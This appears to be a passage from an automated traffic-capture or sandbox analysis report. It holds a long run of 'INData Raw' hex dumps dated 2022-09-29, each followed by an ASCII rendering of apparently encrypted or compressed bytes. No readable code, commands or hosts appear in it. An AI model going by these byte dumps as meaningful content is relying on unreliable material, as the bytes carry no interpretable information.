                                                                                                                                                2022-09-29 12:51:45 UTC20393INData Raw: 40 8e b9 b5 e9 ca 4e 88 3f fd 60 24 93 dd bb 28 83 28 7d cd e2 3f 49 84 2d 34 bd 0f e4 cf 83 84 34 cb 67 d7 45 6e c9 26 61 0d 57 15 1f a8 7c 85 70 89 b0 bf 7c 6e 07 66 66 9e df 1e 7c ba 67 66 5d a9 be 51 61 a8 98 53 ec 69 60 b9 50 58 ca 3b bb 59 d7 15 9e a1 a9 c1 e2 7a be 4f a5 e8 8b 9a bf 99 8f f1 83 fb 8e d7 e9 0f 36 41 bb 0c 2a ff 05 a9 67 70 dd 6b 2c 68 67 8a bd af 7d 46 34 52 59 07 f9 e8 6b 1f 31 ed 82 89 d9 d5 ec 7f f2 17 21 44 d5 f0 17 af a7 50 05 4e 09 74 ad 80 c3 d2 49 72 3d 4f 11 cc fd f7 63 0b 59 86 d9 fa 94 fe 84 ff 0a f5 19 03 04 59 d4 d0 43 e2 69 dd 0a 73 8c ce 73 b0 20 1e 78 14 4c 75 24 13 bd ae 7d 12 0a 26 8b 5f e0 f0 4d b9 8d a4 eb 8e 12 05 89 e9 6f c2 ff 8d 5a ca 8f 14 27 c2 98 f3 02 d1 43 64 fb c7 f3 1f e1 f4 57 eb 68 e9 d0 c0 75 e9 95
                                                                                                                                                Data Ascii: @N?`$((}?I-44gEn&aW|p|nff|gf]QaSi`PX;YzO6A*gpk,hg}F4RYk1!DPNtIr=OcYYCiss xLu$}&_MoZ'CdWhu
                                                                                                                                                2022-09-29 12:51:45 UTC20409INData Raw: a5 f1 22 62 9d cd 3d 43 4c bf 51 cd 97 de 6b ea d6 bd da 12 23 7a db 7a fd 0b 2d 56 78 d5 6c bc 42 d7 a2 35 00 8f ba a9 a8 e3 c3 ca c0 97 b7 48 c6 d0 13 c8 57 78 c2 63 dd 32 f6 4b 42 c6 01 78 18 26 ef b3 96 4a ec 1a ed b2 a3 b2 df cc de ea 5f 33 03 61 a1 1c d8 67 77 69 24 0c da 8b 04 98 60 a9 f0 90 77 f1 6c d0 cc 12 93 dd 65 17 be e5 5b 2e 7f 04 bd b9 5e c1 d8 df c2 a1 e4 23 4d 90 9e fe 5e ed 8c 0b 46 c7 6d ff 7c 0c 3b 22 ec 0a 50 f0 0f c8 bf 61 78 12 77 9a 0a 54 3f ca 86 90 61 f2 79 c7 eb 3b 0e c6 29 84 9c 72 d8 12 25 9b e2 d1 25 f3 6c bc 8d 26 ce b9 c8 3b d4 d6 86 0a c4 87 d0 cd c0 58 c5 57 e9 0e 95 d8 7c 67 c4 e1 19 90 df 80 7e 9e f3 bc 72 96 21 13 9f df 89 07 5e 3d 54 a4 c3 70 e4 7f 20 28 b7 f0 51 e7 a5 70 c3 a5 45 0d ac 58 bf 62 63 da 94 05 8f 8a c7
                                                                                                                                                Data Ascii: "b=CLQk#zz-VxlB5HWxc2KBx&J_3agwi$`wle[.^#M^Fm|;"PaxwT?ay;)r%%l&;XW|g~r!^=Tp (QpEXbc
                                                                                                                                                2022-09-29 12:51:45 UTC20425INData Raw: 9d 54 e7 37 fc fe f2 b3 40 60 f2 82 d8 8e 8a 24 c9 4e a1 d3 ca aa 78 c3 9e d9 af 4c b5 96 7f 70 b5 ac 8a 0d 65 1e be 43 46 ce 79 c3 97 51 16 fa 36 52 74 b2 a4 cf 2e 3f 45 59 3e ad 5d 9b ab 83 1a 0b f8 5e 76 68 9a 5a 77 3c b5 5d 9d 2a 0b aa 97 c9 a0 97 aa 10 ae cb b8 ea 0c 8f c7 15 0f 45 39 3e 69 73 4d 2b 88 18 51 95 f0 c9 ab d8 bd 17 8b 47 ab f3 49 e3 3b b3 1f 8d 6a 50 b4 ca d2 b0 0c df 9c 1e 80 ce e0 46 41 c4 a8 c5 cb d1 8b c3 30 8f 61 85 5e a9 56 c8 fc a7 5c 57 99 f7 58 3a b8 13 47 bf f5 60 c5 a9 5e d0 bc 6d a8 1b 65 66 5e 09 9f 1c 40 7e c3 53 30 7d 57 6c 30 18 ab 6d e9 ba 20 d3 bd fa c1 51 47 df 74 f3 d9 36 5b c5 5e 08 4f 88 cd d2 3f b6 10 38 7e 45 27 30 b2 ea 59 f9 2d 19 87 e9 e7 47 43 f8 fb cd c0 87 44 c1 a3 cb 94 80 26 f4 b7 d4 94 47 da 5d 25 94 80
                                                                                                                                                Data Ascii: T7@`$NxLpeCFyQ6Rt.?EY>]^vhZw<]*E9>isM+QGI;jPFA0a^V\WX:G`^mef^@~S0}Wl0m QGt6[^O?8~E'0Y-GCD&G]%
                                                                                                                                                2022-09-29 12:51:45 UTC20441INData Raw: 1d c0 54 ed 46 db 48 86 53 96 c6 e1 fb 9c fd 54 e7 84 77 4d 88 46 d4 da bf 87 45 0a 36 2c 08 b1 83 78 10 32 69 36 70 69 50 36 2c a9 23 71 a6 d4 ad b9 24 04 f4 ca 15 c6 81 91 13 82 2c dc b1 27 51 6d 20 0b c2 8a 5b fd a6 45 6c 4b 87 46 11 d5 ea b3 86 8c f2 33 1c 86 dc bd 11 d9 e1 f6 6e fa 50 7f df 6d 6b a5 2b 01 39 f0 b5 66 43 dd d3 84 5b e0 e4 e6 f5 51 f8 1a 12 84 e7 33 12 ce 33 17 20 79 9c 02 b7 52 49 36 28 b7 e6 9a 83 ec b7 f6 03 4a 9f f2 7c fa 2e 20 16 88 1a 32 40 a2 e7 9a ed c2 ff 85 c1 37 8a 93 f7 d8 d9 b2 4e 95 5e 28 fa 46 5c fd 7f 9b 04 fc 70 45 5a a6 99 47 e2 3f eb 19 8a c7 d8 d3 db 69 85 9e b0 31 4a e7 da bc 72 49 88 1e 1c a5 6b 3b c8 7c 55 86 0c 05 8e 99 38 0b 74 b6 9c 1e d4 43 67 e0 f4 c2 03 0f b0 81 64 5d 04 37 1f b0 7c 9e 00 3a 8c 49 59 3b 2f
                                                                                                                                                Data Ascii: TFHSTwMFE6,x2i6piP6,#q$,'Qm [ElKF3nPmk+9fC[Q33 yRI6(J|. 2@7N^(F\pEZG?i1JrIk;|U8tCgd]7|:IY;/
                                                                                                                                                2022-09-29 12:51:45 UTC20457INData Raw: 7a 96 67 b6 63 f7 94 c7 1e 73 aa b5 7c 6c 0b fa ef 07 66 26 13 9b 86 78 48 51 6a 8c 1e 0e 5f 52 3c 4d 9e cf 34 fd aa 8e 2f 8c 2b ed 70 25 65 1f d6 c3 61 70 4e dc f1 2c fe 03 42 68 bf df 32 ac ea 4a 4d 1d b0 f9 e6 f6 07 e1 bb 61 65 70 f1 aa 82 6d cc e7 42 44 c3 ee bd eb d4 33 db b3 11 3d bc ac d4 c8 9c bb 75 af e9 fa e9 b6 08 de 34 5c 95 4a 3b 3b a9 44 0b 36 c8 19 6a 30 fb 4c ed 33 38 c2 e5 3f 6c 30 49 c0 f8 ec 4c 7e ce 2b 19 f3 38 25 da 45 33 7a a5 e5 9b d8 99 71 51 4c 0f 8f 5d 8e 53 9d 96 85 6c f4 25 f2 59 0e 30 54 44 a6 99 c7 22 2b 65 aa d6 8f 15 17 ae 50 2b 29 53 f8 1c e6 f5 9f cd cc c7 b5 bc 56 4d 42 b4 23 82 16 aa c3 28 b3 2c c9 b0 da c1 23 74 4f 01 86 6c 20 3b ac 05 6d fc c3 96 5e b4 94 55 3f e7 cd 36 cb f0 d9 a4 57 9d b9 b6 a5 a9 e0 ed 66 61 d1 24
                                                                                                                                                Data Ascii: zgcs|lf&xHQj_R<M4/+p%eapN,Bh2JMaepmBD3=u4\J;;D6j0L38?l0IL~+8%E3zqQL]Sl%Y0TD"+eP+)SVMB#(,#tOl ;m^U?6Wfa$
                                                                                                                                                2022-09-29 12:51:45 UTC20473INData Raw: e8 15 8a f3 ad 51 b2 98 fe 1e 5e cf 25 f0 58 71 56 3f 2c b6 05 61 10 6f ed 9a 13 96 c7 36 95 15 0c 35 6f c0 ee 4c ab a9 01 af 1a 8f 34 cb 1f 5b 2a c8 c7 c7 08 11 ca cf 42 cb 9b f2 88 1e 59 1c c7 8f 1a bb be 63 7e e9 87 e9 a5 df 04 73 17 04 37 01 48 40 10 3c 45 66 b1 9d e3 18 36 2b ed a0 6f 81 22 fb ea c6 3b 73 00 cc 59 77 09 10 9a f0 09 2d 65 2a fe 47 73 e2 62 fe fc b0 33 6b 06 3c fe cf a4 87 dd 8a bb 7c 9a f0 38 24 08 40 f8 9f 54 ed 3a 8a 01 e1 c3 25 58 9f e2 56 f5 44 27 25 78 28 87 57 d3 39 59 23 93 73 d2 ca 58 5e 7b 09 b3 1c 04 e5 1b b0 78 fb c9 43 b0 63 c9 1a 0f 06 45 3a 25 ad d5 a1 3d 76 1f 1a 1a 7a 5f ee ea ae ad a2 d2 63 0a 01 eb 4a 5c 6f 9d 98 eb a1 34 df 74 7a 57 5c 59 ac 87 7b 18 6e 9d 0a 7b 70 29 f2 ca e6 19 e4 7e bf f8 76 6f 2f bb b2 27 9a e2
                                                                                                                                                Data Ascii: Q^%XqV?,ao65oL4[*BYc~s7H@<Ef6+o";sYw-e*Gsb3k<|8$@T:%XVD'%x(W9Y#sX^{xCcE:%=vz_cJ\o4tzW\Y{n{p)~vo/'
                                                                                                                                                2022-09-29 12:51:45 UTC20489INData Raw: e1 84 f0 50 5a 21 b3 48 7f 34 49 8e 5e 15 ce c7 f7 a0 51 73 eb 6c 62 65 a8 49 d4 2c dd 24 de d5 b0 43 f5 5a 28 9f bc bb df 32 39 cd f0 71 5e f0 35 38 4c da 5a 0d 95 af 23 b1 86 39 6b cc 28 57 9e d0 d7 f5 6c ba 86 83 79 cf a2 6f 7b 23 93 e9 87 93 38 39 22 9d 33 a7 fe 00 a3 ed 9b a3 2b 47 eb 67 71 3b c4 a7 5f 7f ac c6 53 f7 6c 5b 85 cf c2 71 94 21 3c bb 30 85 ac e5 f0 aa 0c 98 e3 b9 e0 7c 35 c7 ba 42 e8 ed f1 3c ea 1f 9c df 25 bd 44 4d 21 d3 c9 77 f1 fe 28 e1 57 99 2f 94 67 6b 6f 87 f8 51 01 fb f8 79 f7 95 22 e0 8b 77 cd c4 65 66 38 b2 a9 07 fd f9 4f d2 5e 5c 4c dd f2 41 62 c5 a5 f3 92 b4 59 b6 b7 39 74 f7 93 78 71 b2 a2 10 84 b2 d6 b7 68 95 83 59 61 96 6d b3 f1 c4 36 4a ef f9 c7 53 d9 8e c4 8d 0c 93 b6 36 b7 30 04 d7 77 f8 63 7e 05 6a 0e 34 a5 38 0f f6 6d
                                                                                                                                                Data Ascii: PZ!H4I^QslbeI,$CZ(29q^58LZ#9k(Wlyo{#89"3+Ggq;_Sl[q!<0|5B<%DM!w(W/gkoQy"wef8O^\LAbY9txqhYam6JS60wc~j48m
                                                                                                                                                2022-09-29 12:51:45 UTC20505INData Raw: 72 42 5b 35 a2 92 f6 24 cc 89 68 e2 7a bc d1 7a a5 26 39 85 a6 4e 63 92 b8 ee 21 8c 8b d2 c3 d7 11 39 c4 33 ff cd 46 2c 5e 53 94 16 2c cc 44 a0 c3 c0 52 a5 ae 78 01 bc e5 b8 83 ab 7e 79 24 4a 34 56 49 7b 82 39 0d f7 dc d5 b7 d1 78 11 6b 58 f7 a8 a8 df a0 fa 07 78 12 13 f1 fd 9b 2e 40 e0 16 a3 2e 1a 89 9b 3e 8f 49 09 c8 51 b5 3f 57 d7 c4 57 d3 be f3 68 76 30 b3 37 7c 02 3f 25 93 13 2e 9e 59 8e 79 1e da ac 43 29 38 4a 00 84 ac 0b 37 66 b5 fa 72 02 2a a3 8e 0b 52 da e0 5d 92 45 3b 39 b0 f3 8f 4e 8f 4e 54 a6 b8 a3 75 37 aa fc 1b 10 9b 57 c0 5b 91 82 0f 56 5e 08 8e 15 68 1f 8c 30 29 bc 5a 58 76 87 11 8a 49 0b 6b 64 b5 55 60 be a5 71 71 f7 73 f0 7e 9c d8 76 2c 80 85 26 5c 85 f5 a1 2f bb 46 95 86 87 98 8f 85 53 79 1c 29 f2 0c f7 60 a4 65 0a 3e 5a 52 55 56 6b 26
                                                                                                                                                Data Ascii: rB[5$hzz&9Nc!93F,^S,DRx~y$J4VI{9xkXx.@.>IQ?WWhv07|?%.YyC)8J7fr*R]E;9NNTu7W[V^h0)ZXvIkdU`qqs~v,&\/FSy)`e>ZRUVk&
                                                                                                                                                2022-09-29 12:51:45 UTC20521INData Raw: 1c b3 cf 24 25 aa 39 b8 f1 cb 83 d0 84 20 79 71 75 17 4a 2f 9e 4c be 8a d2 8f 53 96 ce 12 38 a3 e3 50 0e 49 6b 89 23 57 31 cd b6 c2 ce 37 15 b8 5c 96 c3 85 38 6f c6 92 56 9d 22 3d b6 28 cb 14 0b 4e 27 2e fc 41 76 bc 81 0a 44 64 30 7e 4b aa ce 41 77 a5 82 29 1d 1c a7 e8 bb fe 6a 19 3d 79 02 2f 40 3a cf 7a 67 c8 a8 4a 50 9a 3e 9c 7c 0a 25 d7 d9 9d c2 f8 09 43 a1 a1 5c 8c 40 2f 18 0a f5 2f ed 1e de 70 80 ca de 76 2b 2d 23 49 4a e1 cd 66 d4 76 5d 41 14 4d 6a d0 64 01 4c ed 53 5c a2 c5 7e 29 10 af 5b 68 21 2d 29 f3 80 c5 e0 45 a1 97 4b 37 be f4 01 68 43 dd 9c 1a 0d 99 2a 54 90 4f 62 38 34 06 b3 4e 35 b1 3c 91 71 b8 6b 24 f4 84 97 2d 01 eb 7d fa d8 7d 1d 7e 21 6f 08 1a 50 b8 01 45 a8 17 2f 3c 3c ae 99 35 70 cb 9b ff 53 81 30 07 1c 45 c6 45 ba 19 01 6b 07 c6 92
                                                                                                                                                Data Ascii: $%9 yquJ/LS8PIk#W17\8oV"=(N'.AvDd0~KAw)j=y/@:zgJP>|%C\@//pv+-#IJfv]AMjdLS\~)[h!-)EK7hC*TOb84N5<qk$-}}~!oPE/<<5pS0EEk
                                                                                                                                                2022-09-29 12:51:45 UTC20537INData Raw: c6 86 e6 18 bf 34 00 cb af f4 7d a5 e9 21 81 0e b6 07 f5 bb 97 af 2e 98 46 8b 70 6f 15 f9 ba f5 32 13 34 2c 1c 8d 7d d5 ec 03 8f ed ce b1 19 bc 1e f1 38 ac bf 29 d0 c3 15 73 04 f6 75 2c 28 2a b2 f4 bf 93 f0 0d f6 a1 2c 1f 9e 86 37 79 97 b1 76 af af a1 3b 3b 60 62 0d d4 08 ed b2 da d1 78 74 b7 8b 7e 31 9c 76 11 d0 24 99 42 d1 40 d4 32 b7 4f e3 46 ce b0 10 0f 15 25 78 1e dd 97 eb 8e 71 9f 79 ac 61 d7 40 79 9c 02 f5 00 47 ae 54 74 8e ef 6a f6 5a ff 9d e8 c5 8a 56 52 7a c1 73 f5 46 52 06 f4 4b 53 95 89 aa c6 a4 d8 06 9e b4 b7 12 62 f4 20 80 72 b4 39 58 fb 2e 97 7a 00 a1 f0 8d 9c 0a 8b 4a e7 c6 07 3b 08 05 e1 e2 64 54 05 fe 2b 25 9e 5d 83 b7 d8 58 f7 9c 22 2e 95 db 74 13 22 cf a9 8f 71 24 9e 42 41 8a eb 70 dd 23 a1 fd c2 c1 88 7f c6 1e 45 86 05 0f 48 79 62 56
                                                                                                                                                Data Ascii: 4}!.Fpo24,}8)su,(*,7yv;;`bxt~1v$B@2OF%xqya@yGTtjZVRzsFRKSb r9X.zJ;dT+%]X".t"q$BAp#EHybV
                                                                                                                                                2022-09-29 12:51:45 UTC20553INData Raw: 11 93 ab 94 4b a5 d4 12 f0 19 04 7d 7c 03 d5 1d 63 2a 42 47 1c 5f 72 e7 0d 66 15 f4 88 b6 bd fa d6 6e a3 81 19 5b 30 31 5a 8b cb a4 08 48 2d ef b8 b1 be ae 43 05 7d a7 5e 24 94 a0 b9 bd dc 6a 92 e0 3e f5 41 00 5b 7d 2d 61 0a bd ba d5 fd 77 2f 7f e7 e3 78 43 01 da 5a 7c d3 2a b7 06 75 47 96 94 cc 5b 9b e5 6c a6 c2 13 46 6b 74 19 2f 14 1a 46 2b 14 af c8 fb 38 57 81 1f e6 7b 5a c4 e0 70 84 95 a1 29 c8 7f 3d be 14 8e cd 04 6e 44 8d ed a2 ad 2c 8a 38 a1 98 9c d0 d5 f2 36 08 b6 48 da 70 ab e4 68 c6 cb 69 48 8a cc bc b5 e7 6b 9f ef a6 25 7e 69 cc dc 12 31 ae 5e 17 42 4f c7 11 34 5d c4 6c 0e 3f 66 1e d6 3e 47 25 47 ef c3 5d 2d a4 13 a1 40 4e 8a c1 38 a3 8c 30 07 4b 70 6d 81 51 54 39 5e 51 0a af 0b ff 0b bf 44 4d c3 4e e9 d9 1d 45 5f 84 b8 b1 4c 78 47 70 28 dd f3
                                                                                                                                                Data Ascii: K}|c*BG_rfn[01ZH-C}^$j>A[}-aw/xCZ|*uG[lFkt/F+8W{Zp)=nD,86HphiHk%~i1^BO4]l?f>G%G]-@N80KpmQT9^QDMNE_LxGp(
                                                                                                                                                2022-09-29 12:51:45 UTC20569INData Raw: 3d 5b 4e 8a 67 ae a4 f2 25 eb f3 bd 14 bb 94 32 b3 e1 b2 49 ea ca 07 68 b4 79 38 30 6e 0d db b8 d7 40 b2 fb 84 29 69 54 4e 71 52 c8 19 d2 8c 26 62 76 71 44 dd 81 af 98 19 df de b7 86 2f 72 26 48 73 7a 3d 3d 99 3d fe be e8 b5 46 5e bd 23 fb 4b 31 dd e6 49 2b 1d af eb e5 3a a9 8e 3b cc 35 97 23 e4 e5 10 68 83 c9 bf 1d c9 4a c1 d5 33 7c 04 2f 05 80 39 3f 30 ee e0 76 5a 95 9e aa 4c 97 6a 43 a1 6f 13 53 6b 0f 31 56 f6 05 5a da 75 8a 38 8f 57 f7 16 3b 69 cf da 09 23 13 c4 7e 7a d2 51 fe 21 64 0c 98 ea 53 8f e7 0f a2 94 35 e8 04 c1 e4 e3 da 20 7b 0b 3c f9 4e 0f 17 3e cc 38 34 7c f1 ac 58 1e 21 ff cf f3 3b 7c f9 64 92 77 dd 0a 71 4f 64 7f df 9a 9a 1e a6 7e 33 67 b8 c4 0e 55 04 26 70 e2 86 c8 3e 17 ce 33 45 05 6f 00 dd 83 9b fb 7d 54 05 5c a6 f5 1d cd 32 da d3 f6
                                                                                                                                                Data Ascii: =[Ng%2Ihy80n@)iTNqR&bvqD/r&Hsz===F^#K1I+:;5#hJ3|/9?0vZLjCoSk1VZu8W;i#~zQ!dS5 {<N>84|X!;|dwqOd~3gU&p>3Eo}T\2
                                                                                                                                                2022-09-29 12:51:45 UTC20585INData Raw: 35 51 c7 79 d7 f7 69 7b c2 43 8b 33 8c fb 79 da 78 34 12 94 58 b9 35 48 d6 78 b2 7a 74 a5 14 6e 97 b3 cf dc ce 2c cb cf eb 8c c2 03 29 9c da 32 2c e2 a6 fe 47 40 c4 78 ae c7 1d bf 28 81 01 01 9c de 9c c2 51 6c 25 fa 7e f0 bc 84 87 cb f0 c0 8c f5 f4 51 28 e2 97 1a 7b 1a 90 c7 91 dc b3 a2 c1 a9 ec 7a e9 bb e0 89 41 f6 0f 30 03 3c e9 ec 62 cb 37 56 e8 72 8d b2 a7 09 98 9c 3e 6c aa b6 da 29 dd 38 18 e8 05 b2 00 f5 be a7 7b 6d 8d 79 76 72 c0 f7 d1 de ca c5 f4 cd 92 e3 3e 2a 17 24 45 76 45 36 db 66 fa d8 de 00 a1 71 74 31 f5 79 74 84 0d 19 22 dc b9 a0 c7 f1 c8 69 2f ff af 84 aa 01 f8 5d 50 8d 61 af 61 0e 53 dd 70 be 42 e2 08 78 93 09 73 00 e2 44 a0 d8 52 fe 99 ef f8 c0 24 55 99 2f 7d a6 58 95 33 8f 44 e6 e0 2b fa 6e ff 53 7a 72 2d 78 17 48 66 43 03 14 6e 74 d9
                                                                                                                                                Data Ascii: 5Qyi{C3yx4X5Hxztn,)2,G@x(Ql%~Q({zA0<b7Vr>l)8{myvr>*$EvE6fqt1yt"i/]PaaSpBxsDR$U/}X3D+nSzr-xHfCnt
                                                                                                                                                2022-09-29 12:51:45 UTC20601INData Raw: be de 6c 98 ce 37 d7 25 30 87 3d 56 e1 e5 2c 88 68 f3 27 08 30 34 04 cf 60 13 eb 2f d7 e2 f6 f7 fc db 20 43 0e 2a 0c 0a 3c 67 e2 29 dc c2 a1 e0 8b d5 fa ec 28 44 d5 59 32 64 00 2a a4 15 c2 c4 49 e7 b0 95 7d 82 02 ab e2 aa 0f 6a 01 c9 2d ca ad 23 a8 6a 87 b3 e4 89 29 ae 8b 8a d0 ee 79 97 3e 52 4f 8d 54 d3 f2 35 c8 7c 72 f0 c8 89 be 1f ad 02 fa 94 52 94 6c 6c 2f 23 e0 68 91 63 35 68 65 3f 8c 68 ad e6 5e 37 8f d2 32 8a 58 52 c5 b8 bd f5 ca d7 c9 ee f9 00 25 22 c9 e0 82 c2 d7 38 96 47 b0 87 1f 80 0b a4 b6 66 2f cf 11 3d e8 4a 01 cd 55 38 3e 2f d8 3d c5 5e 18 e9 59 fb 7e 11 6b e5 bc 6a 91 18 db 6b bd ff 95 a2 44 e3 df 94 c5 c7 ae f5 60 69 dc fd 17 72 44 59 f3 6d 13 61 6f 32 b9 23 6c b2 df 9c 34 7a 13 2f 16 3b 9a 51 f5 50 af b8 40 35 86 25 57 8c 96 fb ac 7c c7
                                                                                                                                                Data Ascii: l7%0=V,h'04`/ C*<g)(DY2d*I}j-#j)y>ROT5|rRll/#hc5he?h^72XR%"8Gf/=JU8>/=^Y~kjkD`irDYmao2#l4z/;QP@5%W|
                                                                                                                                                2022-09-29 12:51:45 UTC20617INData Raw: 33 81 f5 17 3d 0f 70 ab c8 8f 97 29 bf 49 a2 26 6d c0 99 7d 11 65 75 c0 f6 d8 6b c9 fc e2 72 cd 40 22 7d 74 2c b3 0d 87 a4 47 48 eb 9e 6a 50 5e f1 62 cd b9 24 22 05 1b e1 8e df 21 80 fa d5 35 fa 85 20 48 96 6c 28 68 70 c3 0d b5 46 ad e0 02 ae 61 43 43 6a e4 92 2f 13 be eb f7 6c 6c 3d 4a 07 5b 69 a1 7c 3d 61 91 01 4e ab af c9 54 eb a6 9a 75 4f ef 71 88 d8 2d 32 3b c9 36 0f a0 c2 3a 0f 6f e5 ef 78 e7 2b 2d 1b 57 d3 b8 77 34 05 36 d8 32 8b 21 fb 78 73 e6 d4 16 29 ac 3d 05 92 00 12 4c 27 17 6d 76 b9 5b 4c 74 99 56 73 7e 92 c0 e1 69 00 cd 11 8c 00 c2 04 ff d9 46 b3 c1 3c e8 39 dc ff 85 9e 42 de ff dd b0 64 4f 25 7f 5c 12 a2 b4 da d6 6c 33 58 10 65 e0 10 7d 9a b3 ed fb 6a 83 80 7c 84 f7 ab 50 d3 7e d4 95 7a 88 6f 66 e8 fb df 18 d3 d6 68 8a b2 db b7 04 1f 2e c4
                                                                                                                                                Data Ascii: 3=p)I&m}eukr@"}t,GHjP^b$"!5 Hl(hpFaCCj/ll=J[i|=aNTuOq-2;6:ox+-Ww462!xs)=L'mv[LtVs~iF<9BdO%\l3Xe}j|P~zofh.
                                                                                                                                                2022-09-29 12:51:45 UTC20633INData Raw: 69 ef a5 f7 ba 31 b0 ff 47 35 bf 65 f6 87 bb 83 0a ae 0a 3b 72 1f 8a 9f f3 d5 21 0e d2 5e 1d fc b8 48 83 12 dc bd 39 7a b8 cc 63 38 9e 38 02 b9 69 1f eb 74 53 dc b3 27 f0 15 8b 62 77 7f 60 ff cc 01 81 40 cd f4 15 2a c8 e6 13 02 e5 bd ad f2 36 43 7b 14 bc 59 d0 c3 d3 80 4c b8 b0 cd d7 39 c1 f9 7d 03 a5 36 2e 3a f9 d7 3f de 29 18 b9 96 bb b9 b6 42 7e ac 8d 6d 93 64 4e f3 f4 68 d9 20 e1 4e 78 ed aa d0 22 3b 85 c2 63 4a 09 78 e6 a5 bc 76 d2 5d 05 7c 94 ef 1f 4e e6 9e d7 1a 98 0a 5b ee 5c 02 3b 06 c7 bc 1f d0 77 ca 67 e1 9b 41 2e 24 6a 6f e4 89 ea f2 e7 c8 2e 1b ee 40 9c 80 2c 12 92 fb 56 35 4b 60 5e 02 e8 15 bc 1c cd fd 69 eb d9 47 f0 f0 86 4b 8a fa 2c 5d 27 a9 65 7d 55 4c be ac 78 ea fa 32 e6 17 4e 41 47 0d bf 70 4c a1 7d db ef 00 a4 49 fd 0d 2c 00 2f 5c ea
                                                                                                                                                Data Ascii: i1G5e;r!^H9zc88itS'bw`@*6C{YL9}6.:?)B~mdNh Nx";cJxv]|N[\;wgA.$jo.@,V5K`^iGK,]'e}ULx2NAGpL}I,/\
                                                                                                                                                2022-09-29 12:51:45 UTC20649INData Raw: 95 ad e9 2b 15 92 11 9c b5 d9 88 fb 4d f1 76 dd a1 5a 4b d3 d8 7a dd d7 9e 5d 67 02 34 6e ce 0d 7c 9e 81 6e 9a 73 94 b1 b2 06 5e a5 0c 95 8a 5a 5f 83 16 98 70 84 8a 2f 7c 14 d0 c2 30 b9 f1 5f f6 fc d1 49 63 80 92 7b 40 fc ee 4f 1e e7 9f 54 62 84 42 04 32 06 93 49 ee 18 c8 30 1e 8c 0a 4c 81 5c 3d da 2d fd 93 d7 31 e0 d4 76 88 23 39 84 b9 3f 65 96 4a a9 9a d2 cf 11 23 19 25 73 1d e0 c9 fb b5 4a dd be 63 ff 8d 9e 09 91 0c 4e 69 4c 18 06 3e 28 f1 a5 13 5d d9 76 94 26 56 d6 45 ab 4a 56 44 87 70 d7 28 82 fc 44 f6 a7 e4 9e 3b 20 b3 62 3e a7 7a fd 41 8e d3 39 a4 80 e8 3c 7a 82 73 db c1 45 62 3b 89 98 57 f6 69 2f 84 cc 04 67 42 0c cd 88 c9 ae 40 f6 39 28 4c ac f4 69 02 5f 7e 3c 9d 6e 59 fc 09 49 2b 95 0c f7 54 16 d0 30 c0 fd f9 12 9a c3 dd 46 ac 02 92 92 dd 4b 9c
                                                                                                                                                Data Ascii: +MvZKz]g4n|ns^Z_p/|0_Ic{@OTbB2I0L\=-1v#9?eJ#%sJcNiL>(]v&VEJVDp(D; b>zA9<zsEb;Wi/gB@9(Li_~<nYI+T0FK
                                                                                                                                                2022-09-29 12:51:45 UTC20665INData Raw: f7 52 3a a1 d0 19 95 7c ba eb e8 46 6b 51 a9 97 17 19 4d 0b 62 08 8d dd 67 f8 9b cc 7b 67 0f 79 51 4e a9 c7 9d a1 42 6e e2 06 cd 1d 84 ce 71 4f c4 95 72 03 3f 64 da ff 07 69 5f ff 0a 95 7e 56 97 bf 99 d9 4a 10 69 19 d5 e0 eb 5b b8 4a 4c d4 bb 5c 01 f5 98 76 58 3e 09 39 84 37 27 10 c4 a6 59 eb d7 db 28 0f 20 ba 32 88 9a ae 1e 14 a9 a6 76 66 e2 20 8c d6 95 aa c4 bd 33 00 7b 3d 1b 47 ca d2 7a 4a ee 24 e0 2e 43 bc ea be e9 b3 30 e3 1c 1f 2d 4c e8 57 ee 30 48 b8 6b 23 ca a8 a7 a5 a2 e5 57 17 70 a8 c2 d3 1e 2e 41 c0 8c a5 d9 c8 e9 cf b8 0e 21 38 b3 27 4b 91 3b fb a0 b5 db aa ad 64 6c 7e c1 d3 5a 3d ed c1 4f 01 3f a1 cc ba f3 e4 be dc b6 a6 67 7f cb dc 4c 1c 17 bc 57 d2 70 c9 9c 8c 19 9a 2f 94 ec 40 bd 67 03 c6 e6 1c 30 c4 5f 9b 7f 35 b5 fd ec 54 12 85 c2 bf 18
                                                                                                                                                Data Ascii: R:|FkQMbg{gyQNBnqOr?di_~VJi[JL\vX>97'Y( 2vf 3{=GzJ$.C0-LW0Hk#Wp.A!8'K;dl~Z=O?gLWp/@g0_5T
                                                                                                                                                2022-09-29 12:51:45 UTC20681INData Raw: 3e 07 65 ba 7e 3d c0 57 4c b3 b9 b8 0b 8d 7b 33 51 45 f1 16 f7 66 4b 54 20 c0 84 83 c7 2e f2 19 37 4c 37 b2 99 79 0e f5 52 e9 4a c6 d4 83 27 e3 5f 84 a7 87 4f d4 05 f4 85 df 85 68 b7 78 84 36 6c 06 9d de 90 8b 4a 7b 9f 0a 4c a7 f0 99 f4 3d ea b2 c8 f8 2f 8d bf 77 87 97 fe 02 53 23 bd 56 87 95 ea b8 81 dd 21 a1 14 bb d0 cb 70 40 bc a1 d8 20 5e f5 40 62 d8 6b 14 0a 74 f4 b2 3d bc af bb 0c 0a af 05 7a 7b f9 b4 d8 14 f4 d9 03 4e e9 4d ac 09 d9 0a 82 f2 f3 78 02 53 66 09 5e 70 79 8b 41 a7 45 7c 36 29 08 d1 64 d4 65 b5 b7 45 99 ff f2 22 5d cb 60 ed 6d fd e1 6b 3c 72 91 0a c6 8b 2a 35 21 cb 7d 90 1d 0f dc 1f 9e 76 6f e9 d0 fd 38 92 65 7f a3 dd 6b 33 2c f1 f3 51 bd 41 24 ad 9a 50 32 39 2a 6c e5 df fc 76 90 2e 6a ee c9 6d 23 2a cb c1 fb 55 ae 20 e5 e9 c8 fa 23 7b
                                                                                                                                                Data Ascii: >e~=WL{3QEfKT .7L7yRJ'_Ohx6lJ{L=/wS#V!p@ ^@bkt=z{NMxSf^pyAE|6)deE"]`mk<r*5!}vo8ek3,QA$P29*lv.jm#*U #{
